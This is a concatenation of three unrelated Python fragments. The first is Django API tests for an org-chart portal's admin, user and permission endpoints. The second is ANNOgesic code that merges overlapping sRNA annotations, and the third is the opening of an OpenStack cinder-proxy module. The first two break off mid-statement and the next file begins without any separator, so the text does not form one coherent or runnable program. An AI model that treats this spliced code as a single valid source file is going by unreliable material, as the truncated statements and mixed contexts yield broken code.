'to_windows_username' : self.user_obj.windows_username,
'column_name' : 'Is Admin',
'new_value' : 'False',
}
,{
'to_windows_username' : self.user_obj.windows_username,
'column_name' : 'Active',
'new_value' : 'True',
}
,{
'to_windows_username' : self.user_obj.windows_username,
'column_name' : 'Active',
'new_value' : 'False',
}
]
@classmethod
def tearDownClass(self):
tear_down()
def test_api_accept_only_admins(self):
remove_admin_status()
payload = self.valid_payloads[0]
content = self.post_and_get_json_response(payload)
self.assertTrue((content['post_success']==False) and ("not an admin" in content['post_msg']),
f"api should have detected that user is not an admin and fail\n{content['post_msg']}")
def test_with_valid_data(self):
for payload in self.valid_payloads:
grant_admin_status()
self.assert_post_with_valid_payload_is_success(payload=payload)
## Check if data was saved correctly
saved_object = TblUsers.objects.using('OrgChartWrite').get(windows_username__exact=self.user_obj.windows_username)
if payload['column_name'] == 'Is Admin':
self.assert_post_key_update_equivalence(key_name=payload['column_name'], key_value=payload['new_value'], db_value=str(saved_object.is_admin))
elif payload['column_name'] == 'Active':
self.assert_post_key_update_equivalence(key_name=payload['column_name'], key_value=payload['new_value'], db_value=str(saved_object.active))
else:
raise ValueError(f"{payload['column']} is not recognized as a valid column value in the payload")
def test_data_validation(self):
payload = self.valid_payloads[0]
parameters = [
# Parameter name # Accepted type
'to_windows_username' # str -> windows username
,'column_name' # str -> 'Is Admin' or 'Active' only
,'new_value' # str -> 'True' or 'False' only
]
for param_name in parameters:
if param_name == 'to_windows_username':
valid = [self.user_obj.windows_username]
invalid = [1, 2.3, False, None, 'sdfds']
elif param_name == 'column_name':
valid = ['Is Admin', 'Active']
invalid = [1, 2.3, False, None, 'sdfds']
elif param_name == 'new_value':
valid = ['False', 'True']
invalid = ['a', 1, 2.3, None, False]
else:
raise ValueError(f"test_data_validation(): parameter test not implemented: '{param_name}'. Please remove or implement it")
for data in valid:
grant_admin_status()
self.assert_request_param_good(valid_payload=payload, testing_param_name=param_name, testing_data=data)
for data in invalid:
grant_admin_status()
self.assert_request_param_bad(valid_payload=payload, testing_param_name=param_name, testing_data=data)
class TestAPIDeleteUser(HttpPostTestCase):
@classmethod
def setUpClass(self):
tear_down()
self.api_name = 'orgchartportal_delete_user'
self.post_response_json_key_specifications = [
{'name': 'windows_username' , 'null': False}
]
self.valid_username = 'some_random_name'
self.valid_pms = TEST_COMMISSIONER_PMS
self.valid_payloads = [
{
'windows_username': self.valid_username,
}
]
@classmethod
def tearDownClass(self):
tear_down()
try:
test_user = TblUsers.objects.using('OrgChartWrite').get(windows_username__exact=self.valid_username)
except ObjectDoesNotExist as e:
... ## Good, do nothing
except:
raise
else:
test_user.delete(using='OrgChartWrite')
def test_api_accept_only_admins(self):
remove_admin_status()
payload = self.valid_payloads[0]
content = self.post_and_get_json_response(payload)
self.assertTrue((content['post_success']==False) and ("not an admin" in content['post_msg']),
f"api should have detected that user is not an admin and fail\n{content['post_msg']}")
def add_test_user_if_not_exists(self):
test_user = TblUsers.objects.using('OrgChartWrite').get_or_create(
windows_username=self.valid_username
,pms=TblEmployees.objects.using('OrgChartWrite').get(pms__exact=self.valid_pms)
)[0]
test_user.save(using='OrgChartWrite')
def test_with_valid_data(self):
for payload in self.valid_payloads:
grant_admin_status()
self.add_test_user_if_not_exists()
response_content = self.assert_post_with_valid_payload_is_success(payload=payload)
## Check if data was deleted correctly
try:
saved_object = TblUsers.objects.using('OrgChartWrite').get(windows_username__exact=self.valid_username)
except ObjectDoesNotExist as e:
... ## Good, do nothing
except Exception as e:
raise ValueError(f"test_with_valid_data(): {e}")
else:
self.assertTrue(False, f"{saved_object.windows_username} still exists in the database, unable to delete user")
## Check that a string was returned for windows_username
self.assert_post_key_lookup_equivalence(key_name='windows_username', key_value=response_content['post_data']['windows_username'], db_value=payload['windows_username'])
def test_data_validation(self):
payload = self.valid_payloads[0]
parameters = [
# Parameter name # Accepted type
"windows_username" # str -> windows username
]
for param_name in parameters:
if param_name == 'windows_username':
valid = [self.valid_username]
invalid = [1, 2.3, False, None, 'whateverhappened?']
else:
raise ValueError(f"test_data_validation(): parameter test not implemented: '{param_name}'. Please remove or implement it")
for data in valid:
grant_admin_status()
self.add_test_user_if_not_exists()
self.assert_request_param_good(valid_payload=payload, testing_param_name=param_name, testing_data=data)
for data in invalid:
grant_admin_status()
self.add_test_user_if_not_exists()
self.assert_request_param_bad(valid_payload=payload, testing_param_name=param_name, testing_data=data)
class TestAPIAddUserPermission(HttpPostTestCase):
@classmethod
def setUpClass(self):
tear_down()
self.api_name = 'orgchartportal_add_user_permission'
self.valid_username = TEST_WINDOWS_USERNAME
self.valid_add_by_division_identifier = 'Legal'
self.valid_add_by_wu_identifier = '1120' #Traffic Ops
self.post_response_json_key_specifications = [
{'name': 'windows_username' , 'null': False}
,{'name': 'perm_identifier' , 'null': False}
,{'name': 'wu_added_list' , 'null': False}
]
self.valid_payloads = [
{
'windows_username' : self.valid_username,
'perm_add_by' : 'division',
'perm_identifier' : self.valid_add_by_division_identifier
}
,{
'windows_username' : self.valid_username,
'perm_add_by' : 'wu',
'perm_identifier' : self.valid_add_by_wu_identifier
}
]
@classmethod
def tearDownClass(self):
tear_down()
def test_api_accept_only_admins(self):
remove_admin_status()
payload = self.valid_payloads[0]
content = self.post_and_get_json_response(payload)
self.assertTrue((content['post_success']==False) and ("not an admin" in content['post_msg']),
f"api should have detected that user is not an admin and fail\n{content['post_msg']}")
def test_with_valid_data(self):
grant_admin_status()
for payload in self.valid_payloads:
self.__remove_any_permissions_added_in_this_test() ## Need to remove any additional permissions that are added by this API
self.assert_post_with_valid_payload_is_success(payload=payload)
## Check if data was saved correctly
if payload['perm_add_by'] == 'wu':
saved_object = TblPermissionsWorkUnit.objects.using('OrgChartRead').get(
user_id__windows_username__exact = payload['windows_username']
,wu__wu__exact = payload['perm_identifier']
)
self.assert_post_key_update_equivalence(key_name='is_active', key_value=True, db_value=saved_object.is_active)
elif payload['perm_add_by'] == 'division':
saved_objects = TblPermissionsWorkUnit.objects.using('OrgChartRead').filter(
user_id__windows_username__exact = payload['windows_username']
,wu__subdiv__exact = payload['perm_identifier']
)
saved_wu_permissions = set(each.wu.wu for each in saved_objects)
required_wus_objects = TblWorkUnits.objects.using('OrgChartRead').filter(
subdiv__exact=payload['perm_identifier']
)
required_wus = set(each.wu for each in required_wus_objects)
self.assertTrue(sorted(required_wus)==sorted(saved_wu_permissions)
,f"Permissions added did not match request. In request but not in db [{required_wus-saved_wu_permissions}], and added to db but not in request [{saved_wu_permissions-required_wus}]")
else:
self.assertTrue(False
,f"payload['perm_add_by'] value '{payload['perm_add_by']}' not implemented in test. Wrong data or please add implementation")
def test_data_validation(self):
grant_admin_status()
payload = self.valid_payloads[0]
parameters = [
# Parameter name # Accepted type
'windows_username' # str -> username
,'perm_add_by' # str -> Either 'division' or 'wu'
,'perm_identifier' # str -> a subdiv name, or a wu
]
for param_name in parameters:
if param_name == 'windows_username':
valid = [self.valid_username]
invalid = [1, 2.3, False, None]
elif param_name == 'perm_add_by':
valid = ['division', 'wu']
invalid = ['a', 1, 2.3, '-1', '-1.2', '11.567', '2.2', '4.45', None, False, '']
elif param_name == 'perm_identifier':
valid = [self.valid_add_by_division_identifier, self.valid_add_by_wu_identifier]
invalid = ['a', 1, 2.3, '-1', '-1.2', '11.567', '2.2', '4.45', None, False, '']
else:
raise ValueError(f"test_data_validation(): parameter test not implemented: '{param_name}'. Please remove or implement it")
for data in valid:
if param_name == 'perm_add_by' and data == 'division':
## for division, the perm_id must be a sub div name
payload = copy.deepcopy(payload)
payload['perm_identifier'] = self.valid_add_by_division_identifier
if param_name == 'perm_add_by' and data == 'wu':
## for wu, the perm_id must be a wu
payload = copy.deepcopy(payload)
payload['perm_identifier'] = self.valid_add_by_wu_identifier
if param_name == 'perm_identifier' and data == self.valid_add_by_division_identifier:
## for perm_id with division, the add_by must be 'division'
payload = copy.deepcopy(payload)
payload['perm_add_by'] = 'division'
if param_name == 'perm_identifier' and data == self.valid_add_by_wu_identifier:
## for perm_id with wu, the add_by must be 'wu'
payload = copy.deepcopy(payload)
payload['perm_add_by'] = 'wu'
self.__remove_any_permissions_added_in_this_test() ## Need to remove any additional permissions that are added by this API
self.assert_request_param_good(valid_payload=payload, testing_param_name=param_name, testing_data=data)
for data in invalid:
self.__remove_any_permissions_added_in_this_test() ## Need to remove any additional permissions that are added by this API
self.assert_request_param_bad(valid_payload=payload, testing_param_name=param_name, testing_data=data)
def __remove_any_permissions_added_in_this_test(self):
permissions = TblPermissionsWorkUnit.objects.using('OrgChartWrite').filter(
Q(user_id__windows_username__exact=self.valid_username)
& (
Q(wu__subdiv__exact=self.valid_add_by_division_identifier)
| Q(wu__wu__exact=self.valid_add_by_wu_identifier)
)
)
for each in permissions:
each.delete(using='OrgChartWrite')
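## Note (added for clarity): the Q filter above matches this test user's permissions
## that were granted either for the whole 'Legal' sub-division or for work unit '1120',
## i.e. exactly the rows that the two valid payloads in this class can create.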
class TestAPIDeleteUserPermission(HttpPostTestCase):
@classmethod
def setUpClass(self):
tear_down()
self.api_name = 'orgchartportal_delete_user_permission'
self.valid_username = TEST_WINDOWS_USERNAME
self.valid_add_by_division_identifier = 'Legal'
self.valid_add_by_wu_identifier = '1120' #Traffic Ops
self.post_response_json_key_specifications = [
{'name': 'windows_username' , 'null': False}
,{'name': 'perm_identifier' , 'null': False}
]
self.valid_payloads = [
{
'windows_username' : self.valid_username,
'perm_delete_by' : 'division',
'perm_identifier' : self.valid_add_by_division_identifier,
}
,{
'windows_username' : self.valid_username,
'perm_delete_by' : 'wu',
'perm_identifier' : self.valid_add_by_wu_identifier,
}
]
@classmethod
def tearDownClass(self):
tear_down()
def test_api_accept_only_admins(self):
remove_admin_status()
payload = self.valid_payloads[0]
content = self.post_and_get_json_response(payload)
self.assertTrue((content['post_success']==False) and ("not an admin" in content['post_msg']),
f"api should have detected that user is not an admin and fail\n{content['post_msg']}")
def test_with_valid_data(self):
grant_admin_status()
for payload in self.valid_payloads:
self.__add_any_permissions_needed_in_this_test() ## Need to add the additional permissions that are removed by this API
self.assert_post_with_valid_payload_is_success(payload=payload)
## Check if data was deleted correctly
if payload['perm_delete_by'] == 'wu':
try:
saved_object = TblPermissionsWorkUnit.objects.using('OrgChartRead').get(
user_id__windows_username__exact=payload['windows_username']
,wu__wu__exact=payload['perm_identifier']
)
except ObjectDoesNotExist as e:
... ## Good, do nothing
except Exception as e:
raise ValueError(f"test_with_valid_data(): {e}")
else:
self.assertTrue(False
,f"permission object ({saved_object.user_id.windows_username}, {saved_object.wu.wu}) still exists in the database, unable to delete permission")
elif payload['perm_delete_by'] == 'division':
work_units = TblWorkUnits.objects.using('OrgChartRead').filter(
subdiv__exact=payload['perm_identifier']
)
for work_unit in work_units:
try:
saved_object = TblPermissionsWorkUnit.objects.using('OrgChartRead').get(
user_id__windows_username__exact=payload['windows_username']
,wu__wu__exact=work_unit
)
except ObjectDoesNotExist as e:
... ## Good, do nothing
except Exception as e:
raise ValueError(f"test_with_valid_data(): {e}")
else:
self.assertTrue(False
,f"permission object ({saved_object.user_id.windows_username}, {saved_object.wu.wu}) still exists in the database while trying to delete by division '{payload['perm_identifier']}', unable to delete permission")
else:
self.assertTrue(False
,f"payload['perm_delete_by'] value '{payload['perm_delete_by']}' not implemented in test. Wrong data or please add implementation")
def test_data_validation(self):
grant_admin_status()
payload = self.valid_payloads[0]
parameters = [
# Parameter name # Accepted type
'windows_username' # str -> username
,'perm_delete_by' # str -> Either 'division' or 'wu'
,'perm_identifier' # str -> a subdiv name, or a wu
]
for param_name in parameters:
if param_name == 'windows_username':
valid = [self.valid_username]
invalid = ['a', '-1', '-1.2', '11.567', '2.2', '4.45', 5.46, -1, None, False, True, '']
elif param_name == 'perm_delete_by':
valid = ['division', 'wu']
invalid = ['a', '-1', '-1.2', '11.567', '2.2', '4.45', 5.46, -1, None, False, True, '']
elif param_name == 'perm_identifier':
valid = [self.valid_add_by_division_identifier, self.valid_add_by_wu_identifier]
invalid = ['a', '-1', '-1.2', '11.567', '2.2', '4.45', 5.46, -1, None, False, True, '']
else:
raise ValueError(f"test_data_validation(): parameter test not implemented: '{param_name}'. Please remove or | |
import os
import csv
import math
import copy
import numpy as np
from annogesiclib.gff3 import Gff3Parser
from annogesiclib.helper import Helper
from annogesiclib.coverage_detection import coverage_comparison
from annogesiclib.coverage_detection import replicate_comparison
from annogesiclib.lib_reader import read_wig, read_libs
def modify_attributes(pre_srna, srna, srna_type, input_type):
if (srna_type == "UTR") or (srna_type == "both"):
if pre_srna.attributes["sRNA_type"] != srna.attributes["sRNA_type"]:
if input_type == "pre":
if "antisense" in pre_srna.attributes["sRNA_type"]:
pre_srna.attributes["sRNA_type"] = (
srna.attributes["sRNA_type"])
else:
if "antisense" not in pre_srna.attributes["sRNA_type"]:
srna.attributes["sRNA_type"] = (
pre_srna.attributes["sRNA_type"])
def del_attributes(feature, entry):
attributes = {}
for key, value in entry.attributes.items():
if feature not in key:
attributes[key] = value
return attributes
def detect_overlap(srna, pre_srna, srna_type, overlap):
'''Check whether the sRNA overlaps another sRNA'''
if (srna.seq_id == pre_srna.seq_id) and (
srna.strand == pre_srna.strand):
if (pre_srna.start >= srna.start) and (
pre_srna.end <= srna.end):
modify_attributes(pre_srna, srna, srna_type, None)
overlap = True
elif (pre_srna.start >= srna.start) and (
pre_srna.start <= srna.end) and (
pre_srna.end >= srna.end):
modify_attributes(pre_srna, srna, srna_type, None)
overlap = True
elif (pre_srna.start <= srna.start) and (
pre_srna.end >= srna.start) and (
pre_srna.end <= srna.end):
modify_attributes(pre_srna, srna, srna_type, None)
overlap = True
elif (pre_srna.start <= srna.start) and (
pre_srna.end >= srna.end):
overlap = True
modify_attributes(pre_srna, srna, srna_type, "pre")
return overlap
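# Note on the branches above (added for clarity): they cover, in order,
# pre_srna lying fully inside srna, pre_srna starting inside srna and running
# past its end, pre_srna starting before srna and ending inside it, and
# pre_srna fully covering srna; the last case passes input_type "pre" to
# modify_attributes() so the sRNA_type is reconciled in the other direction.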
def merge_tss_pro(pre_srna, srna, feature):
if (feature not in pre_srna.attributes.keys()) and (
feature in srna.attributes.keys()):
if srna.attributes[feature] != "NA":
pre_srna.attributes[feature] = srna.attributes[feature]
elif (feature in pre_srna.attributes.keys()) and (
feature in srna.attributes.keys()):
if (pre_srna.attributes[feature] == "NA") and (
srna.attributes[feature] != "NA"):
pre_srna.attributes[feature] = srna.attributes[feature]
elif (srna.attributes[feature] not in
pre_srna.attributes[feature]) and (
srna.attributes[feature] != "NA"):
pre_srna.attributes[feature] = ",".join(
[pre_srna.attributes[feature],
srna.attributes[feature]])
def modify_overlap(pre_srna, srna):
'''If the sRNA overlaps another sRNA, modify the position
and attributes of the gff entry'''
merge_tss_pro(pre_srna, srna, "with_TSS")
merge_tss_pro(pre_srna, srna, "end_cleavage")
if (srna.attributes["sRNA_type"] == "5utr") or (
srna.attributes["sRNA_type"] == "3utr") or (
srna.attributes["sRNA_type"] == "interCDS"):
merge_tss_pro(pre_srna, srna, "start_cleavage")
if (srna.start < pre_srna.start):
pre_srna.start = srna.start
if (srna.end > pre_srna.end):
pre_srna.end = srna.end
return pre_srna
def merge_srna(srnas, srna_type):
'''Merge the overlapping sRNAs'''
final_srnas = []
first = True
pre_srna = ""
for srna in srnas:
if srna.feature != "ncRNA":
srna.feature = "ncRNA"
if "with_TSS" in srna.attributes.keys():
if srna.attributes["with_TSS"] == "False":
srna.attributes["with_TSS"] = "NA"
else:
srna.attributes["with_TSS"] = "NA"
if "end_cleavage" in srna.attributes.keys():
if srna.attributes["end_cleavage"] == "False":
srna.attributes["end_cleavage"] = "NA"
else:
srna.attributes["end_cleavage"] = "NA"
overlap = False
if first:
first = False
pre_srna = srna
else:
if (srna.seq_id != pre_srna.seq_id):
if not overlap:
if pre_srna not in final_srnas:
final_srnas.append(pre_srna)
pre_srna = srna
continue
overlap = detect_overlap(srna, pre_srna, srna_type, overlap)
if overlap:
pre_srna = modify_overlap(pre_srna, srna)
if (srna.attributes["sRNA_type"] != "antisense") and (
pre_srna.attributes["sRNA_type"] == "antisense"):
pre_srna = srna
else:
if pre_srna not in final_srnas:
final_srnas.append(pre_srna)
pre_srna = srna
srna.source = "ANNOgesic"
if overlap:
pre_srna = modify_overlap(pre_srna, srna)
if pre_srna not in final_srnas:
final_srnas.append(pre_srna)
else:
if srna not in final_srnas:
final_srnas.append(srna)
return final_srnas
def read_gff(gff_file, type_, ex_srna):
datas = []
if os.path.exists(gff_file):
for entry in Gff3Parser().entries(open(gff_file)):
if type_ == "sRNA":
datas.append(entry)
elif type_ == "tss":
datas.append(entry)
else:
if (Helper().feature_without_notgene(entry)):
if (ex_srna) and (entry.feature != "ncRNA"):
datas.append(entry)
elif not ex_srna:
datas.append(entry)
datas = sorted(datas, key=lambda k: (k.seq_id, k.start,
k.end, k.strand))
return datas
def read_table(table_file, file_type):
datas = []
if os.path.exists(table_file):
f_h = open(table_file, "r")
for row in csv.reader(f_h, delimiter='\t'):
datas.append(import_data(row, file_type))
return datas
def merge_incds_utr(utrs, inters):
'''Merge the sRNAs located within CDSs with the UTR-derived sRNAs'''
new_inters = []
for inter in inters:
remove = False
for utr in utrs:
if inter.source == "in_CDS":
if (inter.seq_id == utr.seq_id) and (
inter.strand == utr.strand):
if ((inter.end < utr.end) and (
inter.end > utr.start) and (
inter.start <= utr.start)) or (
(inter.start > utr.start) and (
inter.start < utr.end) and (
inter.end >= utr.end)) or (
(inter.end >= utr.end) and (
inter.start <= utr.start)) or (
(inter.end <= utr.end) and (
inter.start >= utr.start)):
utr.start = min(inter.start, utr.start)
utr.end = max(inter.end, utr.end)
remove = True
if not remove:
new_inters.append(inter)
return new_inters
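# In short (added for clarity): an "in_CDS" intergenic candidate that overlaps
# a UTR-derived sRNA is absorbed into it, i.e. the UTR entry is widened to
# cover both ranges and the intergenic entry is not kept as a separate entry.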
def compare_srna_cds(srna, cdss, cutoff_overlap):
'''Compare the sRNA with the CDSs to collect information about
the overlap between the sRNA and each CDS'''
detect = False
overlap = False
for cds in cdss:
if (srna.seq_id == cds.seq_id) and (
srna.strand == cds.strand):
if ((srna.end < cds.end) and (
srna.end > cds.start) and (
srna.start <= cds.start)) or (
(srna.start > cds.start) and (
srna.start < cds.end) and (
srna.end >= cds.end)) or (
(srna.end >= cds.end) and (
srna.start <= cds.start)) or (
(srna.end <= cds.end) and (
srna.start >= cds.start)):
overlap = True
per_c = float(min(srna.end, cds.end) - max(
srna.start, cds.start)) / float(cds.end - cds.start)
if per_c <= cutoff_overlap:
if "product" in cds.attributes.keys():
cds_name = "".join([
cds.feature, ":", str(cds.start),
"-", str(cds.end), "_", cds.strand,
"(", cds.attributes["product"], ")"])
else:
cds_name = "".join([
cds.feature, ":", str(cds.start),
"-", str(cds.end), "_", cds.strand])
if "overlap_cds" not in srna.attributes.keys():
srna.attributes["overlap_cds"] = cds_name
srna.attributes["overlap_percent"] = str(per_c)
else:
srna.attributes["overlap_cds"] = (
",".join([srna.attributes["overlap_cds"],
cds_name]))
srna.attributes["overlap_percent"] = (
",".join([srna.attributes["overlap_percent"],
str(per_c)]))
detect = True
if not overlap:
srna.attributes["overlap_cds"] = "NA"
srna.attributes["overlap_percent"] = "NA"
return srna
elif overlap and detect:
return srna
else:
return None
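# Worked example (illustrative coordinates, not from any dataset): an sRNA
# spanning 100-150 and a CDS spanning 120-220 on the same strand overlap by
# min(150, 220) - max(100, 120) = 30 nt, so per_c = 30 / (220 - 120) = 0.3;
# with cutoff_overlap = 0.5 that sRNA is kept and annotated with overlap_cds /
# overlap_percent, whereas a per_c above the cutoff for every overlapping CDS
# makes the function return None and the candidate is dropped.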
def merge_srna_gff(gffs, in_cds, cutoff_overlap, gff_file, ex_srna):
'''Merge all types of sRNAs and write them to one gff file'''
out = open(gffs["merge"], "w")
out.write("##gff-version 3\n")
utrs = read_gff(gffs["utr"], "sRNA", ex_srna)
inters = read_gff(gffs["normal"], "sRNA", ex_srna)
cdss = read_gff(gff_file, "CDS", ex_srna)
num_srna = 0
srnas = None
if (in_cds) and (len(utrs) != 0) and (len(inters) != 0):
inters = merge_incds_utr(utrs, inters)
if (len(utrs) != 0) and (len(inters) != 0):
pre_srnas = inters + utrs
pre_srnas = sorted(pre_srnas, key=lambda x: (
x.seq_id, x.start, x.end, x.strand))
srnas = merge_srna(pre_srnas, "both")
elif len(utrs) != 0:
srnas = merge_srna(utrs, "UTR")
elif len(inters) != 0:
srnas = merge_srna(inters, "inter")
if srnas is not None:
sort_srnas = sorted(srnas, key=lambda x: (x.seq_id, x.start,
x.end, x.strand))
else:
sort_srnas = None
for srna in sort_srnas:
new_srna = compare_srna_cds(srna, cdss, cutoff_overlap)
if new_srna:
new_srna.attributes["ID"] = (
new_srna.seq_id + "_srna" + str(num_srna))
name = '%0*d' % (5, num_srna)
new_srna.attributes["Name"] = "sRNA_" + str(name)
new_srna.attributes = del_attributes("best_high_coverage",
new_srna)
new_srna.attributes = del_attributes("best_low_coverage",
new_srna)
new_srna.attributes = del_attributes("best_avg_coverage",
new_srna)
attribute_string = ";".join([
"=".join(items) for items in new_srna.attributes.items()])
new_srna.info_without_attributes = (
"\t".join([str(field) for field in [
new_srna.seq_id, new_srna.source, new_srna.feature,
new_srna.start, new_srna.end, new_srna.score,
new_srna.strand, new_srna.phase]]))
out.write(new_srna.info_without_attributes + "\t" +
attribute_string + "\n")
num_srna += 1
out.close()
def import_data(row, type_):
if type_ == "inter":
return {"strain": row[0], "name": row[1],
"start": int(row[2]), "end": int(row[3]),
"strand": row[4], "libs": row[5],
"detect": row[6], "avg": row[7],
"high": row[8], "low": row[9],
"detail": row[11], "tss": row[10]}
if type_ == "utrr":
return {"strain": row[0], "name": row[1],
"start": int(row[2]), "end": int(row[3]),
"strand": row[4], "libs": row[5],
"detect": row[6], "avg": row[7],
"high": row[8], "low": row[9],
"detail": row[10]}
def check_real_cut(inter_cuts, tss_type, cut):
for tss, value in inter_cuts.items():
if tss in tss_type.lower():
if cut is None:
cut = inter_cuts[tss]
else:
if cut > inter_cuts[tss]:
cut = inter_cuts[tss]
if cut is None:
if "no_tss" not in inter_cuts.keys():
cut = 0
else:
cut = inter_cuts["no_tss"]
return cut
def get_cutoff(srna, tsss, type_, tables, args_srna):
if type_ == "inter":
tss_type = None
inter_cuts = {"frag": {}, "tex": {}, "notex": {}}
fh = open(os.path.join(args_srna.out_folder, "tmp_cutoff_inter"), "r")
for row in csv.reader(fh, delimiter='\t'):
inter_cuts[row[0]][row[1]] = float(row[2])
if tsss is not None:
for tss in tsss:
if (srna.seq_id == tss.seq_id) and (
srna.strand == tss.strand):
if srna.strand == "+":
if math.fabs(srna.start -
tss.start) <= args_srna.fuzzy_inter:
tss_type = tss.attributes["type"]
if srna.start == tss.start:
break
else:
if (math.fabs(srna.end - tss.start) <=
args_srna.fuzzy_inter):
tss_type = tss.attributes["type"]
if srna.end == tss.start:
break
cut = {"frag": None, "tex": None, "notex": None}
if tss_type is None:
tss_type = "no_tss"
for key, types in inter_cuts.items():
cut[key] = check_real_cut(types, tss_type, cut[key])
elif type_ == "utr":
cut = {}
fh = open(os.path.join(args_srna.out_folder, "tmp_median"), "r")
for row in csv.reader(fh, delimiter='\t'):
if (row[0] == srna.seq_id) and (
row[1] == srna.attributes["sRNA_type"]):
if row[1] not in cut.keys():
cut[row[1]] = {}
cut[row[1]][row[2]] = {"median": float(row[3])}
fh.close()
return cut
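# File formats assumed from the parsing above (not documented in this excerpt):
# tmp_cutoff_inter rows look like "<lib type>\t<TSS type>\t<cutoff>" with lib
# type one of frag/tex/notex, and tmp_median rows look like
# "<seq id>\t<sRNA type>\t<track/condition>\t<median>".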
def devide_covers(covers):
frag_covers = {}
tex_covers = {}
for cond, tracks in covers.items():
if "frag" in cond:
frag_covers[cond] = tracks
elif "tex" in cond:
tex_covers[cond] = tracks
return frag_covers, tex_covers
def merge_srna_datas(srna_datas_tex, srna_datas_frag):
if (len(srna_datas_tex["conds"]) != 0) and (
len(srna_datas_frag["conds"]) != 0):
srna_datas = copy.deepcopy(srna_datas_tex)
for
# Copyright 2014 Huawei Technologies Co., LTD
# All Rights Reserved.
#
# @author: z00209472, Huawei Technologies Co., LTD
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
cinder-proxy manages creating, attaching, and detaching persistent storage volumes.
cinder-proxy plays the same role as cinder-volume in the cascading OpenStack.
cinder-proxy treats the cascaded cinder as its volume backend, converting internal
request messages from the message bus into RESTful API calls to the cascaded cinder.
Persistent storage volumes keep their state independent of instances. You can
attach to an instance, terminate the instance, spawn a new instance (even
one from a different image) and re-attach the volume with the same data
intact.
**Related Flags**
:volume_topic: What :mod:`rpc` topic to listen to (default: `cinder-volume`).
:volume_manager: The module name of a class derived from
:class:`manager.Manager` (default:
:class:`cinder.volume.cinder_proxy.CinderProxy`).
:volume_group: Name of the group that will contain exported volumes (default:
`cinder-volumes`)
:num_shell_tries: Number of times to attempt to run commands (default: 3)
"""
import time
from oslo.config import cfg
from oslo import messaging
from cinder import context
from cinder import exception
from cinder import manager
from cinder import quota
from cinder import utils
from cinder import volume
from cinder.i18n import _
from cinder.image import glance
from cinder.openstack.common import excutils
from cinder.openstack.common import log as logging
from cinder.openstack.common import periodic_task
from cinder.openstack.common import timeutils
from cinder.openstack.common import uuidutils
from cinder.volume.configuration import Configuration
from cinder.volume import utils as volume_utils
from cinderclient.v2 import client as cinder_client
from cinderclient import exceptions as cinder_exception
from eventlet.greenpool import GreenPool
from keystoneclient.v2_0 import client as kc
from keystoneclient import exceptions as keystone_exception
LOG = logging.getLogger(__name__)
QUOTAS = quota.QUOTAS
CGQUOTAS = quota.CGQUOTAS
volume_manager_opts = [
cfg.IntOpt('migration_create_volume_timeout_secs',
default=300,
help='Timeout for creating the volume to migrate to '
'when performing volume migration (seconds)'),
cfg.ListOpt('enabled_volume_types',
default=None,
help='A list of volume types to use'),
cfg.IntOpt('volume_sync_interval',
default=5,
help='seconds between cascading and cascaded cinders '
'when synchronizing volume data'),
cfg.IntOpt('pagination_limit',
default=50,
help='pagination limit query for volumes between '
'cascading and cascaded OpenStack'),
cfg.IntOpt('voltype_sync_interval',
default=3600,
help='seconds between cascading and cascaded cinders '
'when synchronizing volume type and qos data'),
cfg.BoolOpt('volume_sync_timestamp_flag',
default=True,
help='whether to sync volume status based on timestamp'),
cfg.BoolOpt('clean_extra_cascaded_vol_flag',
default=False,
help='whether to clean extra cascaded volumes while syncing '
'volumes between cascading and cascaded OpenStack; '
'please use with caution when set to True'),
cfg.BoolOpt('volume_service_inithost_offload',
default=False,
help='Offload pending volume delete during '
'volume service startup'),
cfg.StrOpt('cinder_username',
default='cinder_username',
help='username for connecting to cinder in admin context'),
cfg.StrOpt('cinder_password',
default='<PASSWORD>',
help='password for connecting to cinder in admin context',
secret=True),
cfg.StrOpt('cinder_tenant_id',
default='cinder_tenant_id',
help='tenant id for connecting to cinder in admin context'),
cfg.StrOpt('cascaded_available_zone',
default='nova',
help='available zone for cascaded OpenStack'),
cfg.StrOpt('keystone_auth_url',
default='http://127.0.0.1:5000/v2.0/',
help='value of keystone url'),
cfg.StrOpt('cascaded_cinder_url',
default='http://127.0.0.1:8776/v2/%(project_id)s',
help='value of cascaded cinder url'),
cfg.StrOpt('cascading_cinder_url',
default='http://127.0.0.1:8776/v2/%(project_id)s',
help='value of cascading cinder url'),
cfg.BoolOpt('glance_cascading_flag',
default=False,
help='Whether to use the cascaded glance'),
cfg.StrOpt('cascading_glance_url',
default='127.0.0.1:9292',
help='value of cascading glance url'),
cfg.StrOpt('cascaded_glance_url',
default='http://127.0.0.1:9292',
help='value of cascaded glance url'),
cfg.StrOpt('cascaded_region_name',
default='RegionOne',
help='Region name of this node'),
]
CONF = cfg.CONF
CONF.register_opts(volume_manager_opts)
def locked_volume_operation(f):
"""Lock decorator for volume operations.
Takes a named lock prior to executing the operation. The lock is named with
the operation executed and the id of the volume. This lock can then be used
by other operations to avoid operation conflicts on shared volumes.
Example use:
If a volume operation uses this decorator, it will block until the named
lock is free. This is used to protect concurrent operations on the same
volume e.g. delete VolA while create volume VolB from VolA is in progress.
"""
def lvo_inner1(inst, context, volume_id, **kwargs):
@utils.synchronized("%s-%s" % (volume_id, f.__name__), external=True)
def lvo_inner2(*_args, **_kwargs):
return f(*_args, **_kwargs)
return lvo_inner2(inst, context, volume_id, **kwargs)
return lvo_inner1
def locked_snapshot_operation(f):
"""Lock decorator for snapshot operations.
Takes a named lock prior to executing the operation. The lock is named with
the operation executed and the id of the snapshot. This lock can then be
used by other operations to avoid operation conflicts on shared snapshots.
Example use:
If a snapshot operation uses this decorator, it will block until the named
lock is free. This is used to protect concurrent operations on the same
snapshot e.g. delete SnapA while create volume VolA from SnapA is in
progress.
"""
def lso_inner1(inst, context, snapshot_id, **kwargs):
@utils.synchronized("%s-%s" % (snapshot_id, f.__name__), external=True)
def lso_inner2(*_args, **_kwargs):
return f(*_args, **_kwargs)
return lso_inner2(inst, context, snapshot_id, **kwargs)
return lso_inner1
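# Hypothetical usage sketch (the class and method below are illustrative, not
# part of this module): decorating a volume operation serializes concurrent
# calls that share the same volume id, because the lock is named
# "<volume_id>-<function name>".
#
#   class ExampleVolumeManager(object):
#       @locked_volume_operation
#       def delete_volume(self, context, volume_id):
#           # a concurrent delete_volume() for the same volume_id blocks here
#           pass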
class CinderProxy(manager.SchedulerDependentManager):
